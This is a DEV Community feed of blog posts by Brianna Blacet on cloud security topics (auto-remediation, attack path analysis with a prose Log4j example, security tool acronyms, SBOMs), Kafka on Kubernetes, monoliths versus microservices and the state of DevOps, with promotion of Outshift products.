DEV Community: Brianna Blacet

Automated Versus Dynamic Remediation: Risks and Rewards

Brianna Blacet — Mon, 17 Jul 2023 19:44:31 +0000

When it comes to cloud security, there seems to be a constant refrain: automate, automate, automate. At first blush, it sounds logical, right? In theory, automation should help eliminate human error, identify misconfigurations, check access and authorization, scan containers and Kubernetes clusters, accelerate the release process, and so on.

And who wouldn't want to automatically remediate problems, threats, and vulnerabilities, right? Well, actually, maybe you and/or your DevOps team.

Before we dissect the issues involved, let's define what we mean by automatic remediation (also called auto-remediation).

What is auto-remediation?

Generally speaking, auto-remediation is the use of tools that detect and remediate cybersecurity issues (misconfigurations, threats, vulnerabilities, and so on) without human intervention. A great example is a security orchestration, automation, and response (SOAR) tool, such as Splunk Phantom, that gives security teams the ability to create "if this, then that" rules for their environment. For example, if the tool finds malware on an endpoint, it might automatically isolate the endpoint to ensure the malware doesn't infect other endpoints in the network. An alert would be sent to security staff to notify them of the problem and/or any action taken (which might include patching software or fixing misconfigurations, for example).

One of the major benefits of auto-remediation is that it's quicker than human intervention. Excessive time lag between detection and automation provides more opportunity for an attacker or piece of malware to do damage. And since some malware can spread quicker than celebrity gossip on Twitter, waiting even a few hours to remediate can be disastrous.

In addition to its efficiency, auto-remediation also helps reduce the load on already overburdened teams. Tracking down problems and fixing them is a tedious, complicated job. Automation can allow humans to spend more time on other, less onerous activities.

What's the problem?

With so many benefits, it's hard to imagine why anyone would object to deploying an auto-remediation tool in their environment. But just like with self-driving cars, too much automation can present its own hazards.

Here are some examples:

Limited context. Even though AI has come a long way, it's still got a long way to go, as far as making judgment calls. One reason is because machine-learning models are limited by insufficient data. There's no way to feed a list of every possible threat or warning sign into a machine-learning model. Those lists just don't exist. Over time, the data sets will grow (especially with new federated technologies that allow data sharing without compromising privacy), but even then, there will always be new monsters under the bed. What's more, every new piece of hardware or software or change in configuration or cloud provider reshapes the equation. In sum, there is an infinite number of items on the "crap that can go wrong" list. And since the humans are the ones making these changes, we're often more equipped to be on alert for problems when we alter the environment.
Unforeseen consequences. Sometimes, when software is allowed to make changes without human intervention or approval, things can go awry. For example, if an auto-remediation tool decides to isolate a whole server (as opposed to killing a specific process), it could result in outages and service-level agreement (SLA) violations. If the human is making the decision, they might be able to switch over to a redundant server, kill only the offending process, or take another, less drastic action. In most cases, humans will be less prone to overcorrection.
Disproportionate reliance on the auto-remediation tool. To explain this one, I'll use the self-driving car analogy again. Weather—excessive fog, rain, or snow—can obscure these vehicles' sensors and cause accidents. Similarly, if the auto-remediation tool hangs or fails (and the error is not caught in time), it could render your network vulnerable.
Robot uprising. Just kidding.

The bottom line is that if you do choose to use auto-remediation, extensive testing and tool validation are critical. DevOps teams will need to closely monitor the environment for unanticipated changes or events. If you're the one choosing the tool (but not one of the DevOps people who have to test and monitor it), be aware that the DevOps team may stop inviting you out for after-work cocktails in retaliation for foisting this burden upon them.

Dynamic remediation: a more prudent alternative?

A middle ground between manual and automated remediation is dynamic remediation. In this scenario, instead of relying completely on an auto-remediation tool, DevOps uses templates as guardrails to apply corrective actions. This allows your team to reap some of the benefits of automation, while mitigating some of the risk. Lightspin, for example, uses infrastructure as code (IaC) Terraform files to generate these templates for users to download and deploy. Users can customize the templates to fit their specific environments.

Some of the major advantages of dynamic remediation include:

Customizability. As I mentioned earlier, most environments are constantly growing, evolving, and changing. Dynamic remediation allows you to tweak and adjust the actions the tool takes, as necessary, in real time.
Integration of human intelligence. As I mentioned earlier, fully automatic remediation is limited by machine learning data. Keeping humans in the equation can lower the chance of overcorrection.
Appropriate time lags. Earlier, I explained how an excessive time lag between detection and remediation can create opportunities for a problem to escalate (lateral movement, for example). But that doesn't mean that all time lags are a bad thing. A quick pause to examine wider context and appropriate alternatives may make the difference between a "good" decision and a decision that will result in an SLA violation. Context is everything.

Both dynamic and automated remediation will undoubtedly improve over time as datasets expand and as our technology grows increasingly sophisticated. In the meantime, just as with driverless cars, we should proceed with caution—continuously re-evaluating the risk/reward ratio we are comfortable with at any given moment.

I'd love to hear your thoughts on this issue, especially if you work in security or DevOps. What level of risk is acceptable? At what level of risk do we lose the benefits of automation? Let me know in the comments. And don't forget to connect with Outshift on Slack!

Attack Path Analysis: What It Is and Why You Should Care

Brianna Blacet — Wed, 28 Jun 2023 21:15:28 +0000

While you probably have most of the fundamental elements of your security stack in place, you may be missing a critical piece of the puzzle: attack path analysis.

Attack path analysis is a proactive approach to security that helps you identify possible vulnerabilities and assess risks in advance of a breach. It is an important complement to the other components of your security strategy, such as threat intelligence, access control and authentication, attack surface management, network/endpoint security, incident response and recovery, and ongoing monitoring and threat hunting.

What is an attack path?

Although they are sometimes confused, an attack path is not synonymous with an attack vector. The term "attack vector" is used to describe a type of attack, such as credential theft, social engineering, or phishing. In contrast, the term "attack path" refers to an end-to-end sequence of steps or actions that an attacker may take as they breach a target environment, or application.

A physical analog for an attack path is home security. For example, the attacker's first step might be to find their way through an exterior gate. Next, the invader may be able to enter your home via your front door, your back door, a side door, or a window. A comprehensive approach to home security includes an awareness of every possible entry point, so you can anticipate potential risks in advance. The same goes for your network or cloud environment.

Depending on the target, a cyberattack path may be simple or complex. It may involve multiple actions (for example, access, privilege escalation, a vulnerability exploit, lateral movement, and/or data exfiltration). An attacker may have to navigate throughout multiple layers of an environment or application, including databases, endpoints, servers, or clouds. Some attacks may be traversed in rapid fashion or carried out in stages (such as with a trojan or time bomb).

To complicate the issue even more, attack paths are usually not static. They may evolve over time as you add microservices or scale out your applications.

Why attack path analysis is so critical

Attack path analysis involves scanning your environment and creating a visual map that shows exploitable paths that a bad actor might leverage to breach your environment, as well as what data or resources will be vulnerable once a breach occurs. Here are some of the benefits:

It gives you the opportunity to prioritize your efforts. Once you identify the most vulnerable entry points and movement paths in your environment, you'll be able to focus resources in these areas first. This is especially helpful if you have a limited security budget.
It allows you to build a multi-layered defense strategy. As you analyze the attack paths in your environment, you'll know where to add security controls and safeguards (like container scanning, for example), and setting up appropriate observability and monitoring solutions. Obviously, the more layers you add to your defense, the more effective you'll be in deterring attackers.
It assists with SOC2 compliance audits. Attack path analysis helps you attain required account, permissions, and environment isolation, ensuring compliance with SOC2 requirements. What's more, a good graph-based attack path analysis tool provides the visibility that auditors need to verify compliance.
It may help you respond to threats more quickly. If you're aware of the attack paths in your environment and a breach occurs, it will be easier to locate and track an attacker's movements, which can speed remediation measures.

Case study: the Log4j attack path

To put attack-path analysis in context, let's use the example of Log4j—the infamous vulnerability that affected the Apache Log4j library. This vulnerability became big news because of the ubiquity of this open source logging utility. It allowed remote code execution, making it particularly onerous.

A high-level Log4j attack path might involve the following steps:

The attacker scans for systems running a version of the utility that contained the vulnerability and establishing them as targets.
The bad actor uses an HTTP request with a payload in its header (usually "user-agent" or "referrer") to trigger the vulnerability.
Next, an attacker sends a malicious request (a Java naming and directory interface, or JNDI, lookup) to a vulnerable web application, server, or other service that used the Log4j library for logging. At that point, the Log4j library processes the payload and paves the way for the remote code execution.
Remote code execution allows attackers to gain unauthorized access to the target service or system, move laterally, steal data, or install malware.

The graphic below depicts this Log4j attack path:

What to look for in an attack path analysis tool

As you evaluate tools for attack path analysis, consider the following attributes:

Comprehensiveness: It's better to choose a robust tool that meets all of your needs than to "brew your own" solution. Think about the topology of your environment and look for a tool that can evaluate all possible attack paths.
Scalability: It's not always possible to anticipate the direction your organization will take in the future. But if you know, for example, that you'll probably be moving into a multicloud, hybrid cloud, or public-cloud environment, you should take this into account as you shop for an attack path analysis tool.
Automation: At the risk of sounding ridiculously obvious, the more you can automate your security processes, the better. That said, automation alone isn't enough. You need tools that will prioritize and contextualize its recommendations and alerts, so that you're not constantly deluged with false alarms and so you don't have to perform an exhaustive manual investigation every time you get an alert.
Visualization and reporting : Graphical representations of your attack paths, vulnerabilities, and associated risks not only help you—they help all of your stakeholders (executives, auditors, and folks on different teams) understand your internal security landscape.
Fast time to value : Graph based algorithms offer out-of-the-box results. You are too busy to spend weeks or months inputting queries into a bespoke vendor's tool. Look for solutions that have cloud security researchers connected closely with graph algorithm engineers to provide contextual prioritization you can trust.

At the end of the day, the right attack path analysis solution is the one that fits the requirements of your unique environment. By carefully evaluating tools based on the criteria above, you'll be most likely to make the right choice.

I'd love to hear about your experiences with attack path analysis solutions. Do you have a favorite? If so, what do you like about it? Let me know in the comments. And don't forget to connect with Outshift on Slack!

Note: Special thanks to Jan Schulte and Luke Tucker for their collaboration on this post.

What's in a Name? Decoding the Language of Today's Cloud-Native Security Solutions

Brianna Blacet — Sat, 17 Jun 2023 01:08:21 +0000

If your company develops cloud-native applications—especially if they reside in a hybrid or multicloud environment—security is probably high on your list of priorities. These applications and environments are characteristically complex, with a multitude of moving parts (microservices, APIs, Kubernetes clusters, and more), each of which can present an attack surface. There are often layers of abstraction, such as AWS Lambda, which may free you from some management tasks but simultaneously obscure visibility. You may be using open source software (OSS) components, which can heighten supply-chain security risks (more on this later). The rapid pace of development and accompanying deadline pressure may leave little time for rigorous security testing.

All of these factors augment the need for end-to-end automated cloud-native security to protect the entire software-development lifecycle, from development to deployment to production, and across multiple clouds.

That said, choosing the solution that's appropriate for you and your environment is anything but straightforward. The market is replete with cloud-native security solutions. How do you know which one is right for you? Adding to the confusion is the proliferation of buzzwords and acronyms that imply standardization (but are often more arbitrary than precise).

For example, in 2021, the analyst firm Gartner published a report that popularized the term Cloud-Native Application Protection Platform, or CNAPP (I'll go deeper into its definition a little later in this blog). You'd think that all CNAPP solutions would have the same (or at least very similar) features and capabilities. But this is not necessarily true. For example, Palo Alto Networks' Prisma Cloud only provides data classification, malware scanning, and data governance for Amazon Web Services. Ermetic's CNAPP does not include a threat-intelligence feed. Cyscale has no cloud infrastructure entitlement management (CIEM) module. Some products provide more comprehensive compliance features. Most (but not all) provide both agents and agentless scanning features. And yet all of them are marketed as CNAPPs.

The bottom line is that regardless of how they are labeled, you'll have to dig deeper than a product's classification to determine whether it will meet your needs. To help you get started, the following is a list of the most common cloud-native security product acronyms (in alphabetical order) and what they mean.

CASB: cloud access security broker

CASBs let you set policies for both managed and unmanaged cloud services. For example, they may be set to allow access to a suite of business tools but to block unauthorized software that could present a threat. They are also useful in ensuring compliance (for HIPAA, PCI, and so on) since they can be used to enforce data safekeeping. The basic checklist for a CASB solution is that it provides visibility, data security, threat prevention, compliance, and protects against shadow IT. CASBs were conceived with the goal to protect proprietary data stored in the cloud. They provide policy and governance across multiple clouds.

CIEM: cloud infrastructure entitlement management

CIEMS are automated cloud security solutions that help protect against data breaches in public cloud environments. They continuously monitor the permissions and activities of entities to ensure that their access controls are appropriate. CIEM tools provide comprehensive reporting help with access management and strengthen cloud-security posture. With a CIEM, an organization can monitor usage and entitlement data in real time. It allows them to detect high risk changes, mitigate threats, and optimize permissions.

CNAPP: cloud-native application protection platforms

Here's how Gartner's "Market Guide for Cloud-Native Application Protection Platforms" defines and describes a CNAPP: "Cloud-native application protection platforms (CNAPPs) are a unified and tightly integrated set of security and compliance capabilities designed to secure and protect cloud-native applications across development and production. CNAPPs consolidate a large number of previously siloed capabilities, including container scanning, cloud security posture management, infrastructure as code scanning, cloud infrastructure entitlement management, runtime cloud workload protection and runtime vulnerability/configuration scanning."

The analyst firm goes on to say that these offerings typically integrate into runtime cloud environments and development pipeline tools and that they include cloud security posture management (CSPM) capabilities, offer software composition analysis (SCA), and container scanning. Lastly, it notes that CNAPPs may include API testing and monitoring, static application security testing (SAST), dynamic application security testing (DAST), and runtime web application and API protection.

CSPMs: cloud-security posture management

The National Institute of Standards and Technologies defines security posture as the "status of an enterprise's networks, information, and systems based on information security resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes." CSPM tools continuously manage infrastructure as a service (IaaS), software as a service (SaaS) and platform as a service (PaaS) security posture through prevention, detection, and response to cloud infrastructure risks. Gartner specifies that these tools should apply common frameworks, enterprise policies, and regulatory requirements to "proactively and reactively discover and assess risk/trust of cloud services configuration and security settings." It also proposed that CSPM should provide for automated or human-driven remediation of identified issues.

CWPPs: cloud workload protection platforms

As opposed to CSPMs, CWPPs focus on protecting server workloads in hybrid, multicloud datacenter environments. They provide visibility for all workloads, whether they reside on physical machines, VMs, containers, or are serverless. Gartner (who, as you can see, has defined most of these security terms) says "CWPP offerings protect workloads using a combination of system integrity protection, application control, behavioral monitoring, intrusion prevention and optional anti-malware protection at runtime. CWPP offerings should also include scanning for workload risk proactively in the development pipeline." If your organization relies on cloud infrastructure or platforms such as IaaS or PaaS, a CWPP can help protect your workloads and applications running on those platforms. If you have a complex IT infrastructure that spans across multiple cloud providers or combines both cloud and on-premises resources, a CWPP can provide unified security management and protection across these environments.

SCA: software composition analysis

While SCA is not specific to cloud-native software, I'm including it here because Gartner mentions it in its CNAPP definition. SCA is a methodology for keeping track of OSS components. Although OSS is not inherently insecure, these components are often not authored in-house, making it hard to know whether a library is sustainably maintained. For example, if a security problem arises, how quickly will it be fixed? How quickly are problems disclosed? SCA lets dev teams track and analyze open source components, discover their supporting libraries, and identify their direct and indirect dependencies (including those that may have deprecated dependencies, vulnerabilities, and potential exploits). Once they've scanned and inventoried the above, they generate a software bill of materials (SBOM), which is a critical tool in conducting audits, providing transparency and visibility into the software supply chain, and enabling organizations to understand the various open-source and third-party components incorporated into their software. When CVEs are discovered, an SBOM makes it faster to recognize where the OSS component is used in an application, so security teams can quickly apply patches.

A rose by any other name

Acronyms and buzzwords aside, the important thing for cloud-native security is to have end-to-end lifecycle protection for cloud-native application environments that cover every stage and element—from development to deployment to production. You need to ensure that your tool can identify risks, help prioritize alerts, and remediate vulnerabilities with powerful attack path analysis.

Here are some elements to look for:

Code and CI/CD security
The ability to scan IaC templates and scripts for security risks
SBOM generation
Deep visibility, including alerts with detailed context to assist with root-cause analysis and remediation
Scanning for containers, APIs, serverless functions, and Kubernetes workloads
Attack-path analysis
An intuitive dashboard to visualize clusters and multicloud environments

If you'd like to try out the functionality I've covered in this article, consider Outshift's Panoptica. You can use its free tier to protect 15 nodes and one Kubernetes cluster (forever!)—no credit card required. You can also check out the OSS projects that underpin Panoptica in the OpenClarity umbrella of tools.

We'd love to meet you. Connect with Outshift on Slack!

Kafka on Kubernetes: Is a DIY or Managed Option Right for You?

Brianna Blacet — Wed, 07 Jun 2023 22:17:05 +0000

Apache Kafka® and Kubernetes are a perfect duo. Kubernetes provides a highly scalable, resilient orchestration platform that simplifies the deployment and management of Kafka clusters, so DevOps can spend less time dealing with infrastructure and more time building applications and services. Experts expect this trend to accelerate as more organizations use Kubernetes to manage their data infrastructure.

If you're in the planning stages, know that there are a range of options, beginning with whether to deploy Kafka yourself or to purchase a managed solution. The right answer will depend on a number of factors, including your budget (DIY is not always cheaper!), the skill level of your staff, and any rules and regulations that govern your industry or your company. This blog will walk you through the options to consider, so you can help your organization make the right choice.

Why DIY?

Self-managed or "do-it-yourself" (DIY) Kafka has some advantages. You'll have more control over your deployment, including whether to extend it across multiple clouds. It may be easier to align with your internal security and operations policies, accommodate your specific data-residency concerns, and better control costs.

In this scenario, your in-house staff must perform the following tasks:

Setting up the infrastructure and storage
Installing and configuring Kafka
Setting up Apache Zookeeper™, if you must. (Zookeeper is now deprecated and will no longer be supported as of Kafka v. 4.0. After that point, Kafka will use KRaft, the Kafka Raft consensus protocol.)
Monitoring and troubleshooting your clusters
Security
Horizontal and vertical scaling
Replication (for disaster recovery and availability)

Is "managed" Kafka really more manageable?

"Managed" Kafka is a service you can purchase from some hyperscalers, such as Amazon Web Services, and other third-party vendors. While the initial cost of the service may give you sticker shock, you may save money on hosting and payroll in the long run. Note that some managed solutions may still require your team to have some level of Kafka expertise on board, especially during the setup phase.

With managed Kafka, you'll lose the ability to control your data residency. What's more, if you're not sure how much compute or storage space you'll need, you may end up with some surprise hosting costs.

While each Kafka vendor's exact offering varies a bit, hosted solutions include setup of the cloud infrastructure necessary to run Kafka clusters, including virtual machines, network, storage, backups, and security.

Most managed solutions (whether or not they include hosting), provide features that:

Install and manage the Kafka software, including upgrades, patches, and security fixes.
Monitor Kafka clusters for issues, such as running out of memory or storage space, and provide alerts or notifications when problems arise. These solutions usually also include tools for troubleshooting and resolving problems like the above.
Ensure that data stored in Kafka clusters is durable and available by replicating data across multiple nodes and data centers.
Perform a variety of additional functions, depending on the solution. For example, they may include features that easily install additional functionality—such as schema management, connectors, and ksqlDB—which allow you to easily integrate with other data systems, transform data and build real-time applications.

What to consider as you sort through the options

Your Kafka deployment will be as unique as your environment. You'll need to account for your cloud provider, the size of your deployment, the applications you're running, and the size of your company, among other factors.

In some companies, there may be two departments involved—one to install the clusters and set up the infrastructure and another to "administer" Kafka, which includes setting up topics, configuring the producers and consumers, and connecting it all to the rest of your application(s). Even if you have folks on board with some Kafka experience, they may not have the knowledge they need to set it up in a cloud or Kubernetes environment. So you may have to hire in this skill set or get training for your existing staff. It may take them a while to come up to speed. This indirect cost may not be trivial, especially for a smaller organization.

If you do have to hire folks, think through the range of tasks you might want them to work on. Who should you choose? As you search, keep in mind that many of the most qualified folks won't have the word "Kafka" in their titles. However, a quick search on LinkedIn turned up a few of the job titles that do:

Kafka site reliability engineer (SRE)
Staff software engineer, Kafka
Kafka admin
Kafka developer
Kafka engineer
Kafka support engineer
Java developer with Kafka

Salary requirements for these folks will vary, depending on your location, the seniority of your candidates, the specific job responsibilities, and so on.

If you're a larger company, you may need to divide up the job by function (infrastructure and development). In smaller companies, you may want to hire folks who will have responsibilities beyond just your Kafka deployment. Either way, this is one of the major costs associated with DIY Kafka.

With a managed solution, you won't need as much Kafka expertise on board, since your provider will take care of most of the operational tasks involved. That said, as mentioned earlier, some solutions may still require you to perform a significant number of setup tasks. You'll still need staff to build your Kafka-based applications and/or integrate them into your application ecosystem.

Hosted versus non-hosted solutions

Depending on the Kafka solution you're considering, you'll need to think about hosting. While this is obvious in the DIY scenario, there are still decisions to make with managed Kafka. Some providers, such as Confluent and Amazon Managed Streaming for Apache Kafka (MSK), include cloud hosting as part of their solutions. Others, such as Aiven and Outshift's Calisti, are not hosted solutions. Still others, such as Instaclustr, give you the option to run your Kafka deployment in their cloud environment or use your own. So you'll need to factor in cloud cost and convenience as you make your choices.

Hybrid open source solutions

If you'd like the idea of using some of the features available in a managed Kafka solution but still want some control over your data, cloud compute and storage, consider using an open source solution. An example is Koperator, a Kubernetes operator that automates provisioning, management, autoscaling, and operations for Kafka clusters deployed to Kubernetes. Koperator provisions secure, production-ready Kafka clusters, and provides fine-grained configuration and advanced topic and user management through custom resources. Have a look at Koperator's readme.md and feel free to contribute to the project.

Learn more about Outshift open source and join our Slack community to be part of the conversation.

Securing the Software Supply Chain: The Struggle Is (Still) Real

Brianna Blacet — Wed, 07 Jun 2023 00:29:15 +0000

If you're reading this, you already know that the cloud has transformed everything about how we develop and consume software. You also know that one of the biggest changes is the fact that almost all enterprise software now includes open-source components, which has supercharged development velocity and innovation.

But open source software (OSS) brings security risks, as well. To be clear, OSS itself isn't inherently less secure than other software. But there's a compound effect: if there's a vulnerability and/or an exploit in a particular OSS package—and that software is used by thousands of other software packages (lookin' at you, Log4Shell)—the problem will spread faster than chickenpox in kindergarten. It is this potential for far-reaching consequences that has prompted regulators to step in to help identify vulnerable systems and the root cause of security incidents.

Just over two years ago, U.S. President Biden issued an Executive Order directing (among other things) the National Institutes of Standards and Technologies (NIST) to issue guidance that would include standards, procedures, or criteria to enhance the security of the software supply chain, including "providing a purchaser a Software Bill of Materials (SBOM) for each product."

However, despite the mandate, NIST's governance, and the work of private industry and OSS organizations, software supply-chain security remains a troublesome problem.

The following are a few reasons why.

Reason #1: The SBOM standards aren't standardized

With the help of the Cybersecurity & Infrastructure Security Agency (CISA) and Office of Management and Budget (OMB), NIST released the guidance the White House asked for in 2021 and updated it in 2022 in its Special Publication 800-161, "Supply Chain Risk Management Practices for Federal Information Systems and Organizations." The publication included measures for managing supply-chain risks, including the use of SBOMs. It also referenced the minimum set of elements an SBOM should contain, as established by the National Telecommunications and Information Administration (NTIA) (more on this later).

Since that publication, other SBOM formats have emerged, including the Linux Foundation's Software Package Data Exchange® (SPDX®) Specification Version 2.3 and CycloneDX (a flagship project of Open Worldwide Application Security Project®, or OWASP). NTIA recommends coupling SPDX with Software Identification tags, or SWIDs (XML files associated with specific software products).

I looked up the word "standard" in the Merriam-Webster dictionary, which defined it as "something established by authority, custom, or general consent as a model, example, or point of reference." The lack of consensus related to SBOM formats precludes it from meeting this definition.

Above image borrowed from xkcd.com: A webcomic of romance, sarcasm, math, and language.

I admit that I'm no expert on standards or SBOMs (or anything beyond making chili and the proper use of semicolons). But it seems we haven't yet arrived at the "standard" part of standardization. This seems problematic. It's critical that we come together as a community to decide on what information we find important and attest to how we will derive it.

Reason #2: The amount of data contained in an "acceptable" SBOM may not be adequate

As I mentioned earlier, Biden's 2021 Executive Order also required the NTIA to produce minimal specifications for SBOMs, which it did (see the result here). Those specs included the following:

The name of the software component
The version number or identifier of the component
A unique identifier for the component
Information about the license under which the component is distributed
Information about the dependencies of the component, including the names and versions of other components it relies on
The platform or operating system for which the component is intended
A cryptographic hash value used to verify the integrity of the component
A brief description of the component and its functionality
Information about the supplier or vendor of the component, such as name and contact details
Information about known vulnerabilities associated with the component
Information about the component's development, maintenance, and support lifecycle
Information or references to evidence supporting the claims made in the SBOM

"These fields aim to provide transparency and improve the understanding of software components and their associated risks in the supply chain," NTIA wrote. "However, it's important to note that the specific fields included in an SBOM may vary depending on the requirements and context of the organization or industry using it."

The agency knew it was walking a fine line. Manufacturers and developers would be less likely to comply if the agency required too many fields. If it required too few fields, there wouldn't be enough information for the SBOM to be useful.

Was it the right balance? It depends on who you ask. Just last week, a colleague of mine said, "I just saw my first SBOM. I have to admit, I was underwhelmed." In his opinion, there was not enough information to trace a vulnerability if it became necessary to do so.

Reason #3: There are multiple ways to generate SBOMs

In its "Innovation Insight for SBOMs," Gartner notes that SBOMs should not be static documents and that they should be updated with each new release of a software component. The analyst firm advises organizations to select SBOM tools that:

Create SBOMs during the build process
Analyze source code and binaries (like container images)
Generate SBOMs for those artifacts
Edit SBOMs
View, compare, import, and validate SBOMs in a human-readable format
Merge and translate SBOM contents from one format or file type to another
Support use of SBOM manipulation in other tools via APIs and libraries

There is a variety of different tools on the market that generate SBOMs, all of them with different bells and whistles. Some come bundled with scanning tools. Some are standalone. Some, like Open SBOM's SPDX SBOM Generator generate only one SBOM format. Others, such as Fossa, support multiple SBOM formats. Some can be run locally via a CLI.

Outshift by Cisco's Panoptica uses the latest industry standards to sign and verify software, including sigstore keyless, symmetric, and asymmetric code signing, to make sure your software is secure and reliable. You can use its free tier—which supports 15 nodes and one cluster—forever.

One challenge that has yet to receive much attention is the issue of integrating multiple SBOMs. In her blog, "KubeClarity: Multi SBOM Integration," author Pallavi Kalapatapu compares using Trivy and Syft, both open-source analyzers that can generate SBOMs for containerized applications. She notes that both of these tools have unique strengths and weaknesses when detecting libraries in a container.

"Managing multiple Software Bill of Materials (SBOMs) may seem quite challenging, given the complexities of handling a single one," she writes, adding that integrating multi-SBOM helps increase the coverage and accuracy of detection.

Kalapatapu describes how KubeClarity (an open source tool that detects and manages SBOMs and scans for vulnerabilities in container images and filesystems) ingests various SBOM formats and converts them into the native format required by vulnerability scanners. Since each vulnerability scanner expects SBOMs in specific formats, merging SBOMs involves the bulk of the work, requiring careful balancing and standardization of inputs to ensure compatibility.

Beyond the SBOM: So, what's next?

According to the experts featured in a recent webinar featuring several prominent industry experts, building software supply-chain security into solutions is crucial to avoid pipeline modification and increase adoption, but information interchange and trust remain complex challenges. Modifying the CI/CD pipeline to incorporate security measures will probably lead to reduced adoption, whereas building security measures into solutions will increase it. Supply-chain security must be addressed at the component level, and while managing fleets of applications may require commercial products, developers cannot rely on commercial solutions to solve the problems.

At the end of the day, the interchange of information and trust remains a complex challenge in software supply-chain security, and the responsibility for this exchange lies with vendors. There are a multitude of problems we'll need to address as we work on solutions.

Let me know your thoughts about SBOMs and software supply-chain management in the comments and don't forget to connect with Outshift on Slack!

Is the Monolith Making a Comeback?

Brianna Blacet — Fri, 12 May 2023 23:59:52 +0000

Last week, I posted a blog that addressed the question of whether platform engineering was "the new DevOps." I mentioned that although Gartner had included platform engineering in its hype cycle for emerging technology in 2022, it actually pre-dated DevOps by several years. Time warp!

Of course, this phenomenon is not unique. Case in point: 1970s-era platform boots are back in style, too. Maybe the "everything that's old is new again" fashion merry-go-round holds true for technology, as well.

Then again, maybe not.

A recent blog by Marcin Kolny, a Senior Software Development Engineer for Amazon Prime Video, left a lot of people wondering whether monolithic applications were destined to make a comeback. Kolny talked about how the Prime Video team had shifted away from the serverless Amazon Web Services (AWS) Lambda, moving its monitoring service to a (gasp!) monolithic model. The disclosure sent shockwaves rippling throughout the cloud-native community.

"While onboarding more streams to the service, we noticed that running the infrastructure at a high scale was very expensive. We also noticed scaling bottlenecks that prevented us from monitoring thousands of streams. So, we took a step back and revisited the architecture of the existing service, focusing on the cost and scaling bottlenecks," he wrote. "Moving our service to a monolith reduced our infrastructure cost by over 90%. It also increased our scaling capabilities. Today, we're able to handle thousands of streams and we still have capacity to scale the service even further."

Let the wild rumpus begin

Unsurprisingly, people had #feelings—lots of them. To many in the cloud-native community, Kolny's admission seemed to insinuate that it's both too difficult and too expensive to scale with distributed/serverless architecture. That did not sit well with a former Docker executive, who even called it "an embarrassment."

Others, such as former AWS engineer Daniel Vassallo, had the opposite reaction. "Everyone is surprised Amazon Prime Video is ditching Lambda for a monolith. I saw Lambda being born, and understood it inside out. I was never convinced it would become a suitable application host," he wrote on Twitter. He attributed Prime Video's adoption to AWS leadership forcing serverless technology down the throats of the rest of the company.

This assertion was disputed by Randall Hunt, another former AWS employee. "I have no idea why [Vassallo] is crafting this absurd narrative that AWS leadership was pushing Lambda. Half of them had no idea what Lambda was. The idea that AWS leadership has any input into tech decisions is kind of laughable." Touché.

Kelsey Hightower, a lauded software engineer, developer advocate, and pre-eminent speaker in the cloud-native community, had a different take. He commented that the blog wasn't meant to be a dig against Lambda, the platform that helped the Prime Video team build the service fast and get to market. "It is a testament to the overhead of microservices in the real world," he wrote. "Moving data around is typically an underestimated cost." He added that a monolithic architecture doesn't mean a spaghetti code base. "You should be writing modular code regardless of the deployment model."

Arun Gupta, author, Vice President, and General Manager of Open Ecosystem Initiatives at Intel Corporation—an open source strategist, advocate, and practitioner for over two decades—agreed with Hightower. "Between #microservices and #monolith, there is NORA (No One Right Answer)," he tweeted. "@primevideo used microservices to get started quickly but then moved to monolith to scale (hard scaling limit at 5% of expected load) and reduce costs by 90%."

Replying to Gupta, Mike Chenetz, Head of Product Marketing at Cisco's Emerging Technology & Incubation Group, and host of the CloudUnfiltered podcast, responded, "I totally agree!"

When all you've got is a hammer, everything looks like a nail

Since Chenetz happens to be my manager and gave me the idea for this blog, I probed him for further thoughts on the topic. "Too many people will pick their platform and program to that platform," he said. "It's backwards. You should first think about the needs of the application, then back into the platform that meets your needs. It might be Kubernetes, maybe monoliths, maybe both."

He explained that trends are irrelevant. "Think about memory, distribution, scalability, latency" he continued. "What are the needs of that application? What are the needs of the components of that application? This is where architects are supposed to come in."

The issue goes beyond comparing microservices to monoliths, Chenetz explained. "The same goes for Kubernetes. "The big corporations started doing it. But it doesn't make sense for startups. You need teams to manage Kubernetes. You don't just spin up one or two Kubernetes clusters and then say, 'I'm done.'"

David Heinemeier Hansson, creator of Ruby on Rails and co-owner and CTO of 37 signals (creators of Basecamp and HEY), echoed Gupta's and Chenetz' sentiments. In a blog entitled "How to recover from microservices," he wrote, "Remember that even the likes of GitHub and Shopify run their main applications as monoliths with millions of lines of code and have thousands of programmers collaborating on them. Do you have many more millions of lines of code or thousands of programmers working on the same code bases? If not, exercise extreme caution before even thinking about microservices."

The right tool for the right job

Jan Schulte, a former Senior Software Engineer for a now-defunct German consulting firm called Asquera GmbH, cautioned that it's important to avoid being seduced by "shiny object syndrome." "Sure, the hot, new shiny thing in tech is cool…but only as long as it actually helps you to get stuff shipped," he said.

Schulte explained that it made sense for the Prime Video team to kick off its service with Lambda, since it helped them get to market quickly. Likewise, it made sense to switch to a monolithic architecture once the service had matured and the team wanted more control. "If you're a software engineer, does it matter to you to run your startup code the same way a Fortune 500 company does, just so you can say 'I run my code the same way Amazon does?' Or would you rather ship new features, bug fixes consistently and provide a reliable experience?"

The latter, he said, should be what engineers focus on. "Every software project is unique. To generally say 'monoliths are bad' or 'microservices are dead now, since someone on the Amazon Prime Video team said something' is really comparing apples with oranges. It's all about choosing the right tool for the job at every stage along the way."

All that said, what do YOU think? Was Kolny's blog a bold move, a crazy one, or a humble discussion of the learning process his team had gone through? What are your thoughts about the costs and benefits of monolithic architecture? Let me know in the comments!

We'd love to meet you. Connect with Outshift on Slack!

Is DevOps Dead? Is Platform Engineering the “New DevOps”? The Final Word.

Brianna Blacet — Fri, 05 May 2023 20:58:54 +0000

There’s been a boatload of blogs, Twitter threads, and articles published over the last several months musing over the question of whether DevOps as we know it is withering away into the archives of O’Reilly oblivion. It’s an interesting (and often amusing) mix of commentary that reflects conflicting notions about what DevOps actually is.

For example, in a blog entitled “DevOps ain’t dead but… we gotta talk,” Mallory Haigh, Director of Customer Success at Humanitec, wrote, “DevOps isn’t dead by any means. The field is still evolving…But the picture isn’t perfect. Organizations often do DevOps in problematic ways, and engineers suffer the fallout. From causing daily cognitive load to permanent shellshock, many DevOps setups are just plain broken.”

In other words, DevOps as a discipline is often misunderstood. While some companies just hire a DevOps engineer and believe they’re “doing DevOps,” they don’t realize that DevOps is not actually a role in and of itself. Truly effective DevOps, Haigh says, is composed of a culture and methodology wherein developers better understand the infrastructure for which they develop. In her characteristic sardonic style, she writes, “They commit to a mistaken ideal by declaring, ‘You build it, you run it—and you just have to suck it up and deal with it.’”

